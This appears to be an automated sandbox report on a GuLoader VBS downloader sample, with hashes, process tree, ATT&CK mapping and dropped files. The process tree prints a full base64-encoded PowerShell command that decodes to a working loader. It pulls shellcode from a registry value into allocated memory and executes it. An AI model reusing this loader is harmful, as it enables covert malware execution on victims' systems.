guloader | f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f

General

Target

f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs
Size

123KB
MD5

ca12931ef2bc25a747d2586e8e199f65
SHA1

799394f1f0cc8b19c38f4ad6272d9b732f51e60e
SHA256

f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f
SHA512

daf8d9da424972116152f15710310b1b26fdbdb29e8f7514982bf2d5585fc856771742d525eced4422a8667eddbd9f360b066610b6e753045f53c8380b604134
SSDEEP

1536:FKQ1kslYluZNA03kyNYzF9AtbSF/DwJQAXR8GYpX5JcogiVvKaj7/yuJNUoBqZTr:FER0gAg9FsewJEk3dP6e8A

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

576 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 576 powershell.exe

pid	process
576	powershell.exe

description	pid	process
Token: SeDebugPrivilege	576	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 1096 wrote to memory of 576	1096	WScript.exe	powershell.exe
PID 1096 wrote to memory of 576	1096	WScript.exe	powershell.exe
PID 1096 wrote to memory of 576	1096	WScript.exe	powershell.exe
PID 1096 wrote to memory of 576	1096	WScript.exe	powershell.exe
PID 576 wrote to memory of 1688	576	powershell.exe	csc.exe
PID 576 wrote to memory of 1688	576	powershell.exe	csc.exe
PID 576 wrote to memory of 1688	576	powershell.exe	csc.exe
PID 576 wrote to memory of 1688	576	powershell.exe	csc.exe
PID 1688 wrote to memory of 1220	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1220	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1220	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1220	1688	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f75cefc70404640cf823fe419af6f9841c3cfee17a9fdbe332da251d0964e17f.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAE4AUwBUAEkARgAgAFQAYQBwAHAAZQByAHMAbQA3ACAAdQBkAG0AYQB0AG4AaQBuAGcAZQAgAEQAZQBiAGwAbwBjACAATQBhAGwAYQB5AHMAaQBhAG4AMwAgAEYAbwByAG0AZQBsAGYAZQBsADgAIABoAG8AYgBsAGkAawBlAGYAcgBlACAARgBPAEwASwAgAHQAZQByAGsAYQBmAGwAIABLAEEATgBVACAAQQBDAEkARABJACAAUwBwAGUAYwA2ACAAUABlAHAAdABvAGcAIABQAHIAZQBkAGUAYwBlAHAAIABLAHkAYQBuAGkAegBpAG4AZwBhACAAUgBpAGMAaABmAGkAIABGAEkATABFAEIATgBLAEUAIAB0AHIAaQBwAGwAIABTAG8AbABiAHIAbgBkAHQAMwAgAGQAZQBwAHUAcgBhAHQAIABQAHIAYQB5AGYAdQAgAEYAcgB1AHQAaQBjAGUAdAAgAFUARABFAEwAQQBEAEQATwAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAEMAYQByAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAGkAbgBkAGUAaAA1ACwAaQBuAHQAIABpAG4AZABlAGgANgAsAGkAbgB0ACAAaQBuAGQAZQBoADcALABpAG4AdAAgAGkAbgBkAGUAaAA4ACwAaQBuAHQAIABpAG4AZABlAGgAOQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABTAGwAZQBlAHAAKAB1AGkAbgB0ACAAQwBhAHIAYQAwACwAaQBuAHQAIABDAGEAcgBhADEALABpAG4AdAAgAEMAYQByAGEAMgAsAGkAbgB0ACAAQwBhAHIAYQAzACwAaQBuAHQAIABDAGEAcgBhADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB2AG8AaQBkACAAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoAEkAbgB0AFAAdAByACAAaQBuAGQAZQBoADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGkAbgBkAGUAaAAyACwAaQBuAHQAIABpAG4AZABlAGgAMwApADsACQANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAWgB3AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAWgBvAHAAcABvACgAaQBuAHQAIABDAGEAcgBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAbwB6AHkAdgBhAHAALABpAG4AdAAgAGkAbgBkAGUAaAAsAHIAZQBmACAASQBuAHQAMwAyACAAQwBhAHIAYQAsAGkAbgB0ACAAQgBBAEwATABFAFQATQAsAGkAbgB0ACAAQwBhAHIAYQA3ACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBKAGUAcgByAHkAIABhAHUAdABvAGMAIABlAGoAbABhAHMAIAB5AGUAYwBoAHkAbAAgAEEAZgBmAGkAbAAgAHYAbwBnAHQAIABBAHMAcABlAHIAIABGAG8AcgBwAGEAZwB0ADQAIABCAHIAbgBlAGgAbwB2AGUAZAAgACAADQAKACQAQwBhAHIAYQAzAD0AMAA7AA0ACgAkAEMAYQByAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABDAGEAcgBhADgAPQBbAEMAYQByAGEAMQBdADoAOgBaAG8AcABwAG8AKAAtADEALABbAHIAZQBmAF0AJABDAGEAcgBhADMALAAwACwAWwByAGUAZgBdACQAQwBhAHIAYQA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQAQQB1AHQAbwB0AHkAcABlAHMAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFQAWQBNAFAAQQBOAEkARQBTAEkAIgApAC4ATABlAGsAdAANAAoADQAKACQAQgBpAGwAdABpAGwAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAQQB1AHQAbwB0AHkAcABlAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAEEAdQB0AG8AdAB5AHAAZQBzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAEIAaQBsAHQAaQBsADIAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABBAHUAdABvAHQAeQBwAGUAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAEgAVQBNAEIATwA9ADAAOwAgACQASABVAE0AQgBPACAALQBsAHQAIAAkAEIAaQBsAHQAaQBsADIALgBjAG8AdQBuAHQAIAA7ACAAJABIAFUATQBCAE8AKwArACkADQAKAHsADQAKAAkADQAKAFsAQwBhAHIAYQAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEMAYQByAGEAMwArACQASABVAE0AQgBPACwAWwByAGUAZgBdACQAQgBpAGwAdABpAGwAMgBbACQASABVAE0AQgBPAF0ALAAxACkADQAKAA0ACgB9AA0ACgBbAEMAYQByAGEAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAVwAoACQAQwBhAHIAYQAzACwAIAAwACwAMAAsADAALAAwACkADQAKAA0ACgANAAoA"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vsqyepgx.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1142.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1141.tmp"
4⤵
PID:1220

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES1142.tmp
Filesize
1KB

MD5
5b8f19e3314564c9cb2c8bf8d80d7807

SHA1
7829665e521f70f4bf11f473fd46628d4ca98312

SHA256
2912e1327ff4eb1c80fae260f7d79e641d43be6048ece835e8fbf239bbc889cd

SHA512
c91e84c2264244e03117c428f2ddfdbd3050fb9bbaac742b49e75f5f25bc7d6f3246e8fc1a0897f08485bf27829bbd881df466d4de94984fa6bdb229c2255ccc

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsqyepgx.dll
Filesize
3KB

MD5
c2dec39245abbb8614be55a2c7920b1e

SHA1
28deb76ffb6517b39345dd7e202939e57ff53983

SHA256
80de4069a261fab0b932cb0e308fb02848b66d7ad1f06b07a1150328cfbb8ede

SHA512
6262ee5befb9745fe2f87cee6506bb813a8b8ea693468ca92f6c9b333428f30da1622f64c9b0e7b398c3ffd77ca93f45df35c63072bfcb1371c2f646e72bbc0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\vsqyepgx.pdb
Filesize
7KB

MD5
2f1126f1e2c110eb7067b9831c91f0f7

SHA1
7306b78101247b1c88e6fa58cbee830971eea44c

SHA256
f0f0ee93a0e61c53ef971d51cbd13b0cd42358e3d5ad8b31687bced7cbb5ddaf

SHA512
c6d4f6fa281a26e31f356ad6ba0c9488086b912db54e9be591d8bf712455fdcb98f03d2d12f60fa7b601599b1895ca10091e88c0347a7119a39c59d8900b15a7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1141.tmp
Filesize
652B

MD5
69ee8eaa272fd987c3f81548f772d7f9

SHA1
e9ca9513c71fd974c7ac41400cbe06cf628c43e8

SHA256
2fb030c9508e6457f8725a42317b8b553a357b1abbb9981dd3f9fe3169e8e7d6

SHA512
4fcb435c03c42cbe549b0636cd9323688c74aea4e8d2f3a556737bd726fad964a882b862579197dc815cdabd7798318d7350bfeb6a32447dbec31e63a0dbb1af

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vsqyepgx.0.cs
Filesize
615B

MD5
1b2f119b151022bb977fb9d85ae015c7

SHA1
2be4ce4b0a74fad4c260fc9a56d163bcee6d5587

SHA256
2c64726434fdab138a011da7c7e6433aaca47fc0a706a36cd0ea459a5f58c7dd

SHA512
ba78074ee8673b7a5318654afc5c94b5c0daef3999e627286e65447a0c16591af03d5dd06284fbb5d72d29e04c3d35403a34f0db333d555c4456c00930df5a42

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vsqyepgx.cmdline
Filesize
309B

MD5
9910527cdbc6a0cceac59e5ff6d62d30

SHA1
8b2a45227a897fc47423e33b8c5f3438b15bfb29

SHA256
529afecb5b0570787dc85ea6d2157d4c67bcf395045281f0c2bd6706de8c9ce6

SHA512
d9fc3a9814ed3795142a328d7a2052c1d6f8f203f798aeb6660df9513d65743b61ac16d78ffd06d5152ba9c33b5a093184fc0f6fcacf679353fda4be982d0ec4

Download Submit
memory/576-57-0x0000000074620000-0x0000000074BCB000-memory.dmp

Filesize
5.7MB

Download
memory/576-56-0x00000000767D1000-0x00000000767D3000-memory.dmp

Filesize
8KB

Download
memory/576-55-0x0000000000000000-mapping.dmp

Download
memory/576-66-0x0000000004FE0000-0x00000000050E0000-memory.dmp

Filesize
1024KB

Download
memory/576-67-0x0000000074620000-0x0000000074BCB000-memory.dmp

Filesize
5.7MB

Download
memory/1096-54-0x000007FEFC421000-0x000007FEFC423000-memory.dmp

Filesize
8KB

Download
memory/1220-61-0x0000000000000000-mapping.dmp

Download
memory/1688-58-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing